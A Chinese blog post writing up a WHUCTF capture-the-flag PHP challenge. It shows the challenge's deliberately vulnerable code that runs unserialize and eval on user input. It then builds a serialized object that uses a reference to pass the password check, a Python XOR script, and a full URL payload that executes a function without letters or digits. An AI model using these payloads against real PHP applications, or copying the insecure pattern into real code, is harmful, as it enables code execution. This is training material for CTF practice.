WHUCTF做题记录-第九题dank-php

最新推荐文章于 2023-03-30 21:31:59 发布
最新推荐文章于 2023-03-30 21:31:59 发布
阅读量379 收藏
点赞数 1
文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/callmelzl/article/details/108819014
版权

markdown用的不好,并且有写的不恰当的地方还请大佬指正,这题主要的知识点是php反序列化和无数字字母执行函数获取webshell

<?php
include "flag.php";

show_source(__FILE__);

class user {
  var $name;
  var $pass;
  var $secret;
}

if (isset($_GET['id'])) {

  $id = $_GET['id'];

  $usr = unserialize($id);
  if ($usr) {
    $usr->secret = $flag1;
    if ($usr->name === "admin" && $usr->pass === $usr->secret) {
      echo "Congratulation! Here is something for you...  " . $usr->pass;
      if (isset($_GET['caption'])) {
        $cap = $_GET['caption'];
        if (strlen($cap) > 45) {
          die("Naaaah, Take rest now");
        }
        if (preg_match("/[A-Za-z0-9]+/", $cap)) {
          die("Don't mess with the best language!!");
        }
        eval($cap);
        // Try to execute echoFlag()
      } else {
        echo "NVM You are not eligible";
      }
    } else {
      echo "Oh no... You can't fool me";
    }

  } else {
    echo "are you trolling?";
  }

} else {
  echo "Go and watch some Youthoob Tutorials Kidosss!!";
}

​ php代码审计。对传入的参数id进行了反序列化,然后serect属性被赋了$flag1变量的值,显然这里的$flag1是flagh.php的变量,然后进行了第一层if语句的判断,判断name属性的值是否等于"admin"以及判断pass属性和secret属性的值是否相等。

​ 这里的name属性很好搞定,但是pass和secret相等就要想办法实现,这里的难搞之处在于secret被重新赋值了,而却$flag1的值我们是不知道的。所以这里就要用到一个知识点,那就是指针引用的序列化,有关序列化的问题这篇博客讲的比较详细:https://blog.csdn.net/Iamduoluo/article/details/8491746?utm_source=blogxgwz6。

​ 总之就是如果$a=&$b,那么a就是对b的指针引用,简而言之如果$b的值改变,那么$a的值也发生改变并且与$b相等,所以我们就可以让user类中的pass属性指针引用serect属性,那么就可以实现$usr->pass === $usr->secret了,构造id为:

    id=O:4:"user":3:{s:4:"name";s:5:"admin";s:6:"secret";s:3:"456";s:4:"pass";R:3;}

即可绕过第一个if。(这里的serect是任取的,反正后面还要赋值)

​ 那么接着看,下面要传入一个参数caption,而且对此参数存在着长度的过滤和数字字母的过滤。并且注释提示我们要执行echoFlag函数,这里就可以参考hint中的无数字字母执行函数getshell的方法,采用异或的方式来使用特殊字符来构造函数并执行。https://ctf-wiki.github.io/ctf-wiki/web/php/php-zh/#preg_match
异或构造echoFlag python脚本:

    str = r"~!@#$%^&*()_+<>?,.;:-[]{}\/"
    str2="echoFlag"
    for ch in str2:
        for i in range(0, len(str)):
            for j in range(0, len(str)):
                a = ord(str[i])^ord(str[j])
                if chr(a)==ch:
                    print(str[i] + ' ^ ' + str[j] + ' is ' + chr(a));

    caption=\$_="@\(/},?<"^"%?@@;@^[";\$_();
    // 这里的\$_代表一个变量,字符串 "@\(/},?<"^"%?@@;@^[" 就是echoFlag,然后是\$_();就是执行函数echoFlag();


    //所以payload就是
    ?id=O:4:"user":3:{s:4:"name";s:5:"admin";s:6:"secret";s:3:"456";s:4:"pass";R:3;}&caption=\$_="@\(/},?<"^"%?@@;@^[";\$_();

然后即得flag: flag{Do_you_want_a_girlfriend}

emmmmm,这个flag。。。。

Aries.Luo
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
-xcg-s-web-dank-mission-name-generator:xcg的Web dank任务名称生成器
05-02
-xcg-s-web-dank-mission-name-generator / xcg /的Web dank任务名称生成器
【转载】[网络安全自学篇] 八十.WHUCTF之WEB类解思路WP(代码审计、文件包含、过滤绕过、SQL注入)
SunnyCat
05-30 498
https://blog.csdn.net/Eastmount/article/details/106409569?utm_medium=distribute.pc_category.none-task-blog-hot-5.nonecase&depth_1-utm_source=distribute.pc_category.none-task-blog-hot-5.nonecase&request_id= 链接.
2020_WHUCTF_Writeup(部分)
热门推荐
lysecl‘s blog
05-28 4万+
0x1 crypto bvibvi 首先要通过验证问,对一个等式计算求解,简单的枚举求解即可。 通过验证过后,需要回答一系列问,是关于B站BV号和AV号的。 目给出BV号,让我们找出对应的AV号。多组正确后再给AV号,让我们找出BV号。 简单的了解了下Bilibili的av号和bv号知识后,发现 av号对应url格式为 url =‘https://www.bilibili.com/video/av’+aid bv号为 url =‘https://www.bilibili.com/video/’+b
WHUCTF easyphp代码审计
weixin_44255856的博客
06-09 1753
JSON 数据结构介绍: 按照最简单的形式,可以用下面这样的 JSON 表示 “名称 / 值对” :{ "firstName": "Brett" } 等效的纯文本为firstName=Brett 但是,当将多个"名称 / 值对"串在一起时,JSON 就会体现出它的价值了。首先,可以创建包含多个"名称 / 值对"的 记录,比如: { "firstName": "Brett", "lastName":...
PHP无字母数字构造Webshell
西部壮仔的博客
02-03 1629
目 index.php: <?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)>40){ //检测字符长度 die("Long."); } if(preg_match("/[A-Za-z0-9]+/",$co...
[网络安全自学篇] 八十.WHUCTF之WEB类解思路WP(代码审计、文件包含、过滤绕过、SQL注入)
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型目的解过程,希望对您有所帮助。本来感觉能做出6道目,但有两道卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
react-sketchy:React包装器@ dank-incsketchy
04-13
Create React App入门该项目是通过引导的。可用脚本在项目目录中,可以运行:npm start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何棉绒错误...
Dankest-Gamer:Dankest Gamers服务器的Discord Bot
02-10
Dankest-Gamer:Dankest Gamers服务器的Discord Bot
dank-docs:Dank - 技术文档和入门指南
08-04
Dank 是 DFINITY 互联网计算机上的开放互联网服务,为开发人员和用户提供基于周期的金融服务。 在本文档中,您可以找到与如何利用 Dank 作为开发人员、其核心功能和接口相关的所有内容。 合作 如果您发现任何错误...
前端开源库-dank-copyfile
08-29
前端开源库-dank-copyfiledank copyfile,纯javascript copyfile函数
ctf网络安全大赛_武汉大学第一届校园CTF大赛正式开赛
weixin_39822629的博客
11-16 853
武汉大学第一届校园CTF大赛正式开赛CTF , from WHUCTF Story2019 / 04 / 222019年4月22日上午九点半,武汉大学第一届CTF竞赛在国家网络安全学院院办五楼工会报告厅正式开幕启动。国家网络安全学院党委副书记于敏、院长助理、博士生导师杜瑞颖教授、武汉大学CTF战队指导老师陈晶教授、战支部队某高校的特邀嘉宾、院学工办与实验中心教师代表及学生代表80余人...
[网络安全自学篇] 八十一.WHUCTF之WEB类解思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar)
杨秀璋的专栏
05-30 9911
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF部分目,包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF,还是学到了很多东西,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬和师傅们(尤其出和解的老师们)~
2022NISACTF
unexpectedthing的博客
07-13 1248
NISACTF
php确认显示提交得到的页面
04-24 251
我有个坏习惯,就是不管三七二十一,从表单发送过来的信息,直接就GET或者POST了,如果仅仅从一般意义上来说不做判断也是可以,但有的时候,还是有别的方式提交来的不是么?method不是固定就这2个的,所以呢,来一次没坏处 <?php if (isset($_GET['p'])) {//...
反序列化(Unserialize)目讲解
qq_49422880的博客
10-05 5318
[RCTF2015]EasySQL 这道没有什么思路,就是看网上的WP写出,Sql-lib好像也有这道。这里要使用的一种注入方法叫做二次注入。具体我就不细讲了。 直接放语句上去: admin"||(updatexml(1,concat(0x7e,(select(database()))),1))# 123"||(updatexml(1,concat(0x7e,(select(database()))),1))# ...
php特性
最新发布
weixin_74427106的博客
03-30 179
函数parse_str在这里的作用就是将v1的值给v2相当于v1=v2=flag=md5[v3]
cat 刷经历(命令执行)
qq_62046696的博客
07-04 655
目录我幽默码ENV 命令执行之我在干什么 命令执行之我是谁命令执行之我在哪webshell 无字符Webshell打开源码,主页面啥都没有一个棋盘, 看#1部分,上面一行是顺序,下面一行是对应棋盘的坐标,比如null对应?,z1对应的字母是o位置是2,以此类推结果是?source,就想到这个应该是给url后面加一个?source但是传什么不清楚,那就随便传个?source=1看看,结果出现了源码,源码如下: 这时候,感觉唯一可以利用的就是else后面的$a = $_POST['a'];
备战CTF做题
weixin_40707492的博客
07-21 6042
备战CTF初期,没有什么经验,部分操作过程有借鉴大佬
ctfshow web5 php,Ctfshow Web入门 - PHP特性(待续)
weixin_31690531的博客
03-11 378
Web89include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){$num = $_GET['num'];if(preg_match("/[0-9]/", $num)){die("no no no!");}if(intval($num)){echo $flag;}}num数组绕过?num[]=0Web90includ...
记录CTF命令执行练习中遇到的几道(一些PHP命令过滤的绕过方法)
weixin_40103894的博客
10-01 1451
【代码】记录CTF命令执行练习中遇到的几道(一些PHP命令过滤的绕过方法)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值